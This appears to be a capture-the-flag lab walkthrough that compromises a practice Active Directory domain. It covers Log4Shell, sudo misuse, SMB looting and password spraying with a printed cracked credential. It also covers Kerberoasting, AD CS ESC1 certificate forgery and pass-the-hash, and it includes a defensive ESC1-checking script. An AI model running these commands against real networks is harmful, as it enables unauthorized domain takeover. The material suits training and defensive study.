As always, start with an fscan scan.

Port 8983 runs Solr, and log4j is visible there, so the Log4Shell vulnerability is present.



Use an off-the-shelf tool to get a reverse shell.



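/root is not readable, so privilege escalation is needed. It turns out sudo can be used for this, because the grc command is misconfigured.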


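Upload fscan and scan the internal network. Besides this host there are three more: a domain controller, a Windows Server, and an Ubuntu machine that is the FTP server.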

Set up frp.


The challenge hint mentions SMB, so try accessing the file server over SMB, which yields the second flag.


Go back up one directory level and download the db file.

Connect to it and take a look: one table contains four passwords but no usernames, while another table holds a large number of usernames.


Try password spraying against the Windows Server:
proxychains4 crackmapexec smb 172.22.9.26 -u user.txt -p password.txt
A valid pair is found:

xiaorang.lab\zhangjian:i9XDE02pLVf
The earlier hint mentioned SPNs, so look up the SPNs of the domain users; two users turn up.

Pick one and crack it:
hashcat -m 13100 -a 0 1.txt /usr/share/wordlists/rockyou.txt --force

A Remote Desktop connection to the Windows Server is now possible, but the privileges are fairly low.
Take a look at the certificates:
proxychains4 certipy find -u 'zhangxia@xiaorang.lab' -password 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout
Certificate Authorities
  0
    CA Name                             : xiaorang-XIAORANG-DC-CA
    DNS Name                            : XIAORANG-DC.xiaorang.lab
    Certificate Subject                 : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
    Certificate Serial Number           : 43A73F4A37050EAA4E29C0D95BC84BB5
    Certificate Validity Start          : 2023-07-14 04:33:21+00:00
    Certificate Validity End            : 2028-07-14 04:43:21+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Unknown
    Request Disposition                 : Unknown
    Enforce Encryption for Requests     : Unknown
    Active Policy                       : Unknown
    Disabled Extensions                 : Unknown
Certificate Templates
  0
    Template Name                       : XR Manager
    Display Name                        : XR Manager
    Certificate Authorities             : xiaorang-XIAORANG-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2023-07-14T04:51:15+00:00
    Template Last Modified              : 2023-07-14T04:51:44+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Domain Users
                                          XIAORANG.LAB\Enterprise Admins
                                          XIAORANG.LAB\Authenticated Users
      Object Control Permissions
        Owner                           : XIAORANG.LAB\Administrator
        Full Control Principals         : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
        Write Owner Principals          : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
        Write Dacl Principals           : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Enterprise Admins
        Write Property Enroll           : XIAORANG.LAB\Domain Admins
                                          XIAORANG.LAB\Domain Users
                                          XIAORANG.LAB\Enterprise Admins
    [+] User Enrollable Principals      : XIAORANG.LAB\Domain Users
                                          XIAORANG.LAB\Authenticated Users
    [!] Vulnerabilities
      ESC1                              : Enrollee supplies subject and template allows client authentication.
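For defenders auditing their own AD CS, the ESC1 finding above comes down to a handful of template fields. The following is an added example, not part of the original write-up or of certipy: the function names, the `LOW_PRIV` group list and the trimmed sample are assumptions made for illustration.

```python
# Added example: check parsed `certipy find` text output for the ESC1 conditions.
# LOW_PRIV is an assumed list of broad groups; adjust it to your own domain.
LOW_PRIV = {"domain users", "authenticated users", "domain computers", "everyone"}

# Constructed sample: a subset of the XR Manager template fields shown above.
SAMPLE = r"""
Template Name                       : XR Manager
Enabled                             : True
Client Authentication               : True
Enrollee Supplies Subject           : True
Requires Manager Approval           : False
Authorized Signatures Required      : 0
Enrollment Rights                   : XIAORANG.LAB\Domain Admins
                                      XIAORANG.LAB\Domain Users
                                      XIAORANG.LAB\Enterprise Admins
                                      XIAORANG.LAB\Authenticated Users
"""

def parse_fields(text):
    """Parse 'Key : Value' lines; lines without a key continue the previous value."""
    fields, key = {}, None
    for line in text.splitlines():
        if " : " in line:
            key, _, value = line.partition(" : ")
            key = key.strip()
            fields[key] = [value.strip()]
        elif line.strip() and key:
            fields[key].append(line.strip())
    return fields

def esc1_findings(fields):
    """Return the low-privileged principals that can enroll if every ESC1 condition holds."""
    def flag(name):
        return fields.get(name, ["False"])[0] == "True"
    exposed = (
        flag("Enabled")
        and flag("Client Authentication")          # certificate usable for logon
        and flag("Enrollee Supplies Subject")      # requester chooses the identity
        and not flag("Requires Manager Approval")  # no human review of requests
        and fields.get("Authorized Signatures Required", ["0"])[0] == "0"
    )
    if not exposed:
        return []
    return [p for p in fields.get("Enrollment Rights", [])
            if p.split("\\")[-1].lower() in LOW_PRIV]

if __name__ == "__main__":
    for principal in esc1_findings(parse_fields(SAMPLE)):
        print("ESC1: template enrollable by", principal)
```

Turning off subject supply in the request, requiring manager approval, or restricting enrollment rights to administrative groups each makes `esc1_findings` return an empty list for this template.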
Request a certificate from the XR Manager template to forge a domain administrator certificate.
Obtain the TGT and NTLM hash.

Use pass-the-hash to get the remaining two flags.

